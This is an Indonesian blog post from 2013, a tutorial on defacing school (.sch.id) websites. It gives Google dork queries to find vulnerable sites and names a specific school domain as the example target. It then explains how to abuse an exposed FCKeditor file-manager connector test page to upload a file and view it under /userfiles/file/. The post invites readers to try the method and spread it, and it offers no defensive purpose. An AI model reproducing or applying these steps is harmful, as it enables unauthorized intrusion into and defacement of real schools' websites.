Jumat, 13 Desember 2013

Cara Deface Website Sekolah Dengan Gampang

Dan pada kali ini saya akan memberikan Cara Deface Website Sekolah Dengan Gampang dengan domain Sch.Id, oke langsung saja kita mulai tutorialnya ya sob...

1. Pertama-tama siapkan dulu Script untuk Deface sob

2. Kemudian pasang Dork ini di Search Engine sobat

inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?

Pilih salah satu Dork diatas, sebagai contoh

inurl:/html/siswa.php?

Lalu copy dan paste kan di Search Engine untuk mencari Website Sekolah yang Vuln


Klik gambar untuk memperjelas


3. Jika sudah ketemu kita pilih salah satu Websitenya, sebagai contoh

Website, www.sman1kotabaru.sch.id

4. Kita siapkan

Exploit: /editor/filemanager/connectors/test.html

Jadi, www.sman1kotabaru.sch.id/editor/filemanager/connectors/test.html


Seperti ini gambarnya
5. Ubah Connector ASP ke PHP
Untuk Scriptnya kita ambil saja file.txt gan, sobat buat dulu filenya di Notepad terserah mau nulis apa saja.
6. Kemudian Upload fil.txt yang di buat tadi, untuk melihat hasilnya Deface tadi
Beri embel-embel /userfiles/file/namafile.txt di website tadi
Jadi, www.sman1kotabaru.sch.id/userfiles/file/namafile.txt

Ganti nama namafile.txt dengan file.txt yang sobat buat tadi
Misal www.sman1kotabaru.sch.id/userfiles/file/sofyanpublish.txt

Ini hasil dari tutorial ini,
Selamat mencoba, jika sudah berhasil bagikan tutorial ini kepada teman-teman semua

Sumber : Klick

0 komentar:

Posting Komentar